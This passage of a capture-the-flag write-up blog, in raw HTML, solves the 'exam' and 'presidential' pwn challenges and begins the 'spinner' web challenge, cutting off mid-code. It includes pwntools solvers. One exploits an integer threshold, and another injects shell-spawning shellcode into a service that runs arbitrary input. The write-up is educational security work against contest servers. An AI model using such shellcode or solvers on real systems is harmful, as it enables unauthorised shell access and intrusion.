width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>exam(Pwn)</h2>\n<blockquote>\n<p>I thought my tiring AP season was over, but I heard that they’re offering a flag in AP Cybersecurity! The proctor seems to have trust issues though…</p>\n</blockquote>\n<p>First, let’s check the binary protections.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/2541dd41572e6e4d6a3aeb4d98a9e84b/1790f/image-20240525184639840.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 16.666666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAqklEQVQI102Myw7BUAAFu/PYCAmNEKIeqUdvq7SKUm7Sllsr/P+vDK0Qi8mcxclo0joSryTKjUnmCVdHoZYZqbgUTqyU+zrjsbrw9DLUNEL2NyTjEGVGHNpL9rr9xmHbFGiREXAV53cs4uYp0pkk7Poce0HhsOMhB1t2LYHfmLOuTbErQ5zqqCDf/2inrkfcD1joJmLmYtcn2KUBTn4oGz+LnNLH/6Fv+MsLg5VbmOx5nw4AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/2541dd41572e6e4d6a3aeb4d98a9e84b/8ac56/image-20240525184639840.webp 240w,\n/static/2541dd41572e6e4d6a3aeb4d98a9e84b/d3be9/image-20240525184639840.webp 480w,\n/static/2541dd41572e6e4d6a3aeb4d98a9e84b/e46b2/image-20240525184639840.webp 960w,\n/static/2541dd41572e6e4d6a3aeb4d98a9e84b/1671b/image-20240525184639840.webp 1189w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/2541dd41572e6e4d6a3aeb4d98a9e84b/8ff5a/image-20240525184639840.png 240w,\n/static/2541dd41572e6e4d6a3aeb4d98a9e84b/e85cb/image-20240525184639840.png 480w,\n/static/2541dd41572e6e4d6a3aeb4d98a9e84b/d9199/image-20240525184639840.png 960w,\n/static/2541dd41572e6e4d6a3aeb4d98a9e84b/1790f/image-20240525184639840.png 1189w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/2541dd41572e6e4d6a3aeb4d98a9e84b/d9199/image-20240525184639840.png\"\n            alt=\"image-20240525184639840\"\n            title=\"image-20240525184639840\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Decompiling the program reveals that the flag can be obtained if <code class=\"language-text\">trust_level</code> exceeds the threshold value (<code class=\"language-text\">0x7ffffffe</code>).</p>\n<p>The initial value of <code class=\"language-text\">trust_level</code> is computed as 0 minus the <code class=\"language-text\">detrust</code> value supplied as input.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 740px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9d0ba1bd38ebd3ea734547d54a9d93e2/50383/image-20240602180922808.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 87.08333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACRUlEQVQ4y4WUa5KjMAyEc5nZhKfx24Ahycz9z9TTMoFJ7U6yP1RWEfxFarU4ee8QQkCaM8YxwVkL5xzDwDrmXnI5PYwx0Fq/jVNV1Yi8PI4RbhxhYoQPvpzKWPz5+MD5fMZF4nL5b5zatkWOGp/rhJxnzHnBuqyY1zum6x0xjYjTDO8D+r5H3TSo6/plnBq+MEaHZZ0RgyttKT1Ae8sKDYYQ0SiFS1Whqi6Mqlzcz3+Abdsg8PK8Lohs2VNPRYAZCFUDLDUd1Ja3XfcWdlRojYal+D0vK82qrMPgfNFQcxhdr9A8Wq2egL+BT9uLhPJizBlumopmkTqGeeFzqXiAon6i4QF+1fIO1H2DdeaECU7ULacJ65S3k+CF+RQT+kGXwbyqsgAlojfwtE8r1YinjPiQrbNtRYi4oWu7A7aBfmA7+ABKO9FpjFOCTTKcWCwTxpmmDgjU1QmcA2sOSP0E3/IDWImOusPXGnG7rrRRhidkoTczdb3evzAvVwQOyxLcceJyTyr/teWmYUus0tGLY6aZCepoHS+mHqdSWcuWxUIS/QPY9d1WJbfkaSg1X+qw5lS8aKhd0ZBw8aFIkbiOiUMR8F6h7L0WnendgfnRsnhLq5brl7jTE2ZWdWN7t/VWJizxyTVc+AHRBdZzUGprVwp6RAHKpsiPQVpNnjqxxcghJP4rpyv+UzS2Zi5tqofJBzqheZr4MWUhOzvglgOtQ4DqH3tb/XxFqu3cnz2f+/YcU66bugCN3uywa1pX9duvyt/+2+MbKUYQcqAlCk4AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9d0ba1bd38ebd3ea734547d54a9d93e2/8ac56/image-20240602180922808.webp 240w,\n/static/9d0ba1bd38ebd3ea734547d54a9d93e2/d3be9/image-20240602180922808.webp 480w,\n/static/9d0ba1bd38ebd3ea734547d54a9d93e2/ca4a8/image-20240602180922808.webp 740w\"\n              sizes=\"(max-width: 740px) 100vw, 740px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9d0ba1bd38ebd3ea734547d54a9d93e2/8ff5a/image-20240602180922808.png 240w,\n/static/9d0ba1bd38ebd3ea734547d54a9d93e2/e85cb/image-20240602180922808.png 480w,\n/static/9d0ba1bd38ebd3ea734547d54a9d93e2/50383/image-20240602180922808.png 740w\"\n            sizes=\"(max-width: 740px) 100vw, 740px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9d0ba1bd38ebd3ea734547d54a9d93e2/50383/image-20240602180922808.png\"\n            alt=\"image-20240602180922808\"\n            title=\"image-20240602180922808\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>However, <code class=\"language-text\">detrust</code> must be non-negative, and it is not possible to supply a value that sets <code class=\"language-text\">trust_level</code> to exactly <code class=\"language-text\">0x7ffffffe</code> directly.</p>\n<p>That said, entering the correct string afterward allows <code class=\"language-text\">trust_level</code> to be decremented by 1 each time.</p>\n<p>The plan is therefore: supply <code class=\"language-text\">2147483646</code> as the input (which sets <code class=\"language-text\">trust_level</code> as close to <code class=\"language-text\">0x7ffffffe</code> as possible), then enter the correct string twice to push <code class=\"language-text\">trust_level</code> over the threshold and obtain the flag.</p>\n<p>I wrote the following solver to automate this.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># Set context</span>\nCONTEXT <span class=\"token operator\">=</span> <span class=\"token string\">\"debug\"</span>\ncontext<span class=\"token punctuation\">.</span>log_level <span class=\"token operator\">=</span> CONTEXT\n\n<span class=\"token comment\"># Set target</span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token string\">\"./exam\"</span>\nexe <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Run program</span>\n<span class=\"token comment\"># is_gdb = True</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">False</span>\n<span class=\"token keyword\">if</span> is_gdb<span class=\"token punctuation\">:</span>\n    target <span class=\"token operator\">=</span> gdb<span class=\"token punctuation\">.</span>debug<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">,</span> aslr<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">,</span> gdbscript<span class=\"token operator\">=</span>gdbscript<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n    target <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"challs.actf.co\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">31322</span><span class=\"token punctuation\">)</span>\n    <span class=\"token comment\"># target = process(TARGET_PATH)</span>\n\n<span class=\"token comment\"># Exploit</span>\ntarget<span class=\"token punctuation\">.</span>recvline_startswith<span class=\"token punctuation\">(</span><span class=\"token string\">b\"How much should I not trust you? >:)\"</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"2147483646\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">while</span> <span class=\"token boolean\">True</span><span class=\"token punctuation\">:</span>\n    target<span class=\"token punctuation\">.</span>recvline_startswith<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Prove your trustworthyness by\"</span><span class=\"token punctuation\">)</span>\n    payload <span class=\"token operator\">=</span> <span class=\"token string\">b\"I confirm that I am taking this exam between the dates 5/24/2024 and 5/27/2024. I will not disclose any information about any section of this exam.\"</span>\n    target<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Running this solver successfully retrieved the correct flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ff0ad487b8648077c8589d40d52b3187/27f8b/image-20240525234440546.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 45.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABVElEQVQoz3WSWVPCQBCE9020vFDwQJQqQG4SICQkhCsIGPEs//9/aWdmsxRa8aGrd5NUzzczUc8lD9+DGHF9hlnBweSmj/GVBfesCeekDvuwgt5RNVVp71RcdHaB4bUtH1mZMqyDsjjf0/RfEfVEgXFtinUlxKocwM914V92xEfsJC/blrO5D4l+n3C/kNoU+vi0VnghwsW9S+3a1HaPaH+LxxDku9LFOG9pT54FDMEAF22oNRG+tSMJ3FRDuNkWhqcNomjA2Xld3GhwXNNj+SM7I4QDvHeWEjgvDqUaV9cEdkKnzwGRsfu5jtB4VNw9N2pKMRXdaUKmi5NQEygBed2Wn7SlA7syVxOkw5LADbX8Za+xbS6wLI0Q0vxmRD1NxOfJbV/EtOxcxBQwyxrJ8lpQCwr8oKW8tiJsG3M8P05k6+ys6MGTEA6XDdNc+R9lT/ttfgDz8ApmGnXL2AAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ff0ad487b8648077c8589d40d52b3187/8ac56/image-20240525234440546.webp 240w,\n/static/ff0ad487b8648077c8589d40d52b3187/d3be9/image-20240525234440546.webp 480w,\n/static/ff0ad487b8648077c8589d40d52b3187/e46b2/image-20240525234440546.webp 960w,\n/static/ff0ad487b8648077c8589d40d52b3187/f992d/image-20240525234440546.webp 1440w,\n/static/ff0ad487b8648077c8589d40d52b3187/1d28e/image-20240525234440546.webp 1730w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ff0ad487b8648077c8589d40d52b3187/8ff5a/image-20240525234440546.png 240w,\n/static/ff0ad487b8648077c8589d40d52b3187/e85cb/image-20240525234440546.png 480w,\n/static/ff0ad487b8648077c8589d40d52b3187/d9199/image-20240525234440546.png 960w,\n/static/ff0ad487b8648077c8589d40d52b3187/07a9c/image-20240525234440546.png 1440w,\n/static/ff0ad487b8648077c8589d40d52b3187/27f8b/image-20240525234440546.png 1730w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ff0ad487b8648077c8589d40d52b3187/d9199/image-20240525234440546.png\"\n            alt=\"image-20240525234440546\"\n            title=\"image-20240525234440546\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"presidentialpwn\" style=\"position:relative;\"><a href=\"#presidentialpwn\" aria-label=\"presidentialpwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>presidential(Pwn)</h2>\n<blockquote>\n<p>👍</p>\n</blockquote>\n<p>The challenge provides the following Python script as its binary.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\">#!/usr/local/bin/python</span>\n\n<span class=\"token keyword\">import</span> ctypes\n<span class=\"token keyword\">import</span> mmap\n<span class=\"token keyword\">import</span> sys\n\nflag <span class=\"token operator\">=</span> <span class=\"token string\">\"redacted\"</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"White House declared Python to be memory safe :tm:\"</span><span class=\"token punctuation\">)</span>\n\nbuf <span class=\"token operator\">=</span> mmap<span class=\"token punctuation\">.</span>mmap<span class=\"token punctuation\">(</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> mmap<span class=\"token punctuation\">.</span>PAGESIZE<span class=\"token punctuation\">,</span> prot<span class=\"token operator\">=</span>mmap<span class=\"token punctuation\">.</span>PROT_READ <span class=\"token operator\">|</span> mmap<span class=\"token punctuation\">.</span>PROT_WRITE <span class=\"token operator\">|</span> mmap<span class=\"token punctuation\">.</span>PROT_EXEC<span class=\"token punctuation\">)</span>\nftype <span class=\"token operator\">=</span> ctypes<span class=\"token punctuation\">.</span>CFUNCTYPE<span class=\"token punctuation\">(</span>ctypes<span class=\"token punctuation\">.</span>c_void_p<span class=\"token punctuation\">)</span>\nfpointer <span class=\"token operator\">=</span> ctypes<span class=\"token punctuation\">.</span>c_void_p<span class=\"token punctuation\">.</span>from_buffer<span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">)</span>\nf <span class=\"token operator\">=</span> ftype<span class=\"token punctuation\">(</span>ctypes<span class=\"token punctuation\">.</span>addressof<span class=\"token punctuation\">(</span>fpointer<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\nu_can_do_it <span class=\"token operator\">=</span> <span class=\"token builtin\">bytes</span><span class=\"token punctuation\">.</span>fromhex<span class=\"token punctuation\">(</span><span class=\"token builtin\">input</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"So enter whatever you want 👍 (in hex): \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\nbuf<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>u_can_do_it<span class=\"token punctuation\">)</span>\n\nf<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">del</span> fpointer\nbuf<span class=\"token punctuation\">.</span>close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"byebye\"</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>Reading this code makes it clear that it simply executes whatever shellcode is provided.</p>\n<p>I wrote the following solver.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\ntarget <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"challs.actf.co\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">31200</span><span class=\"token punctuation\">)</span>\n\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">'amd64'</span>\nshellcode <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>amd64<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>sh<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nassembled_shellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>shellcode<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Exploit</span>\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"(in hex): \"</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> assembled_shellcode<span class=\"token punctuation\">.</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish exploit</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>This gave us a shell and allowed us to retrieve the flag successfully.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/f1c14edb30d75518f203892d07a61dd3/7161f/image-20240526175856054.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 67.08333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB9klEQVQ4y5VTa3PSUBTMjLZI1T60PqqW9zMUCCQkIUAgUEsTSLEP+VBH//+/WM85CQh2BscPZ+7m3rl795zdKDddH7eDOUJjiht9hpnmI2wHVDOE+hwLI8SiEwr2axNMi31cZrsIqiP0z1qwT+vovmug91GDeaJCWZpz/HLv8aD7eHQW+G74dMHGOGXC/dSGl+rAOzcw+mIINo4qaL0qQj8sC9Zfl9e4TVi5064QqCOM0xYm9DLXOGNhcNaG9fYCtedpXOxnotrLoPkij2Yyri2ck1UJqAWbJFtvaiK/9bKIBh3yyqUdFP6rlKAyxHXZxZBa6n3QRP6uC6xiJ+E9zWxe86j/EtRnKTQSOVH4d+0i2jxTvLRJwzZxXRrga97BVaEvK9eU9thBGT4pbySyqO9n5YE640SEN0mVyxwbYUPWjE2EPcKOPMKkvM+GuZ91iQaPxSaznPcNwTx7NmetcGmH4LZ/uHdYWnP8HD7gsX9L9Q0z1ZNscRlHVSKizJFxnWNVDHRIPZ9ttcxmsILReUfiwqFlVfzNr3fjBDCRdVIUAo4TJ2DV/pOWuZ2hBNeESZd5ZsZhJVJH30LC63GJ1FWjcG9Eaq0wSYRMxq/zxmrI4irN5anb+fjsj+vNAw42E8cKZ/SXhPWJzORfGduqZCEiislW+DeE4X/GuclJsQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/f1c14edb30d75518f203892d07a61dd3/8ac56/image-20240526175856054.webp 240w,\n/static/f1c14edb30d75518f203892d07a61dd3/d3be9/image-20240526175856054.webp 480w,\n/static/f1c14edb30d75518f203892d07a61dd3/e46b2/image-20240526175856054.webp 960w,\n/static/f1c14edb30d75518f203892d07a61dd3/575d1/image-20240526175856054.webp 1182w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/f1c14edb30d75518f203892d07a61dd3/8ff5a/image-20240526175856054.png 240w,\n/static/f1c14edb30d75518f203892d07a61dd3/e85cb/image-20240526175856054.png 480w,\n/static/f1c14edb30d75518f203892d07a61dd3/d9199/image-20240526175856054.png 960w,\n/static/f1c14edb30d75518f203892d07a61dd3/7161f/image-20240526175856054.png 1182w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/f1c14edb30d75518f203892d07a61dd3/d9199/image-20240526175856054.png\"\n            alt=\"image-20240526175856054\"\n            title=\"image-20240526175856054\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"spinnerweb\" style=\"position:relative;\"><a href=\"#spinnerweb\" aria-label=\"spinnerweb permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>spinner(Web)</h2>\n<blockquote>\n<p>spin 10,000 times for flag</p>\n</blockquote>\n<p>Accessing the challenge server launches an application that counts how many times you spin a ball by holding and dragging the mouse.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 364px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/08f06f592755faf5895833785927ba3e/e45a9/image-20240525234656517.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 124.58333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAZCAYAAAAxFw7TAAAACXBIWXMAAAsTAAALEwEAmpwYAAABC0lEQVQ4y+2Vaw6CMBCEuf9lvIEXwWgCCjFBEl4igXZ0XSpFoFTRP8YmG6bt5KPbpcXBh5vzB34HKGX3HAvdMwt8ho3Nm6DOFEy1pgHKkoO0yWtcIbU0BcIQOBw4SNPYmHdyhcqUJIDvMygIOEjTGM1NbctoynXdARRMh9KTPLMpq8miAPb7IUSlTnPksQbmeR+oQ49H1uSxBlbVcO+oILsdsFoBrvtCysoQx1wABSWg5wHrNWurouhvFAI4nWRbWXkP0lkml33YZSlvEN4z0s8e65RZc6e6nG9VzdtxaTyejvmssoiiCBt3226FMJ712etLQUUjev237kNOTz4gczAroA5evMLf/KdcAYycueIa4ysGAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/08f06f592755faf5895833785927ba3e/8ac56/image-20240525234656517.webp 240w,\n/static/08f06f592755faf5895833785927ba3e/1555d/image-20240525234656517.webp 364w\"\n              sizes=\"(max-width: 364px) 100vw, 364px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/08f06f592755faf5895833785927ba3e/8ff5a/image-20240525234656517.png 240w,\n/static/08f06f592755faf5895833785927ba3e/e45a9/image-20240525234656517.png 364w\"\n            sizes=\"(max-width: 364px) 100vw, 364px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/08f06f592755faf5895833785927ba3e/e45a9/image-20240525234656517.png\"\n            alt=\"image-20240525234656517\"\n            title=\"image-20240525234656517\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Reading the server-side code shows that the flag is returned once the count exceeds 10,000.</p>\n<div class=\"gatsby-highlight\" data-language=\"javascript\"><pre class=\"language-javascript\"><code class=\"language-javascript\"><span class=\"token keyword\">const</span> state <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token literal-property property\">dragging</span><span class=\"token operator\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">,</span>\n    <span class=\"token literal-property property\">value</span><span class=\"token operator\">:</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span>\n    <span class=\"token literal-property property\">total</span><span class=\"token operator\">:</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span>\n    <span class=\"token literal-property property\">flagged</span><span class=\"token operator\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">const</span> <span class=\"token function-variable function\">message</span> <span class=\"token operator\">=</span> <span class=\"token keyword\">async</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>state<span class=\"token punctuation\">.</span>flagged<span class=\"token punctuation\">)</span> <span class=\"token keyword\">return</span>\n    <span class=\"token keyword\">const</span> element <span class=\"token operator\">=</span> document<span class=\"token punctuation\">.</span><span class=\"token function\">querySelector</span><span class=\"token punctuation\">(</span><span class=\"token string\">'.message'</span><span class=\"token punctuation\">)</span>\n    element<span class=\"token punctuation\">.</span>textContent <span class=\"token operator\">=</span> Math<span class=\"token punctuation\">.</span><span class=\"token function\">floor</span><span class=\"token punctuation\">(</span>state<span class=\"token punctuation\">.</span>total <span class=\"token operator\">/</span> <span class=\"token number\">360</span><span class=\"token punctuation\">)</span>\n\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>state<span class=\"token punctuation\">.</span>total <span class=\"token operator\">>=</span> <span class=\"token number\">10_000</span> <span class=\"token operator\">*</span> <span class=\"token number\">360</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        state<span class=\"token punctuation\">.</span>flagged <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span>\n        <span class=\"token keyword\">const</span> response <span class=\"token operator\">=</span> <span class=\"token keyword\">await</span> <span class=\"token function\">fetch</span><span class=\"token punctuation\">(</span><span class=\"token string\">'/falg'</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">{</span> <span class=\"token literal-property property\">method</span><span class=\"token operator\">:</span> <span class=\"token string\">'POST'</span> <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n        element<span class=\"token punctuation\">.</span>textContent <span class=\"token operator\">=</span> <span class=\"token keyword\">await</span> response<span class=\"token punctuation\">.</span><span class=\"token function\">text</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span>\n<span class=\"token function\">message</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">const</span> <span class=\"token function-variable function\">draw</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">const</span> spinner <span class=\"token operator\">=</span> document<span class=\"token punctuation\">.</span><span class=\"token function\">querySelector</span><span class=\"token punctuation\">(</span><span class=\"token string\">'.spinner'</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">const</span> degrees <span class=\"token operator\">=</span> state<span class=\"token 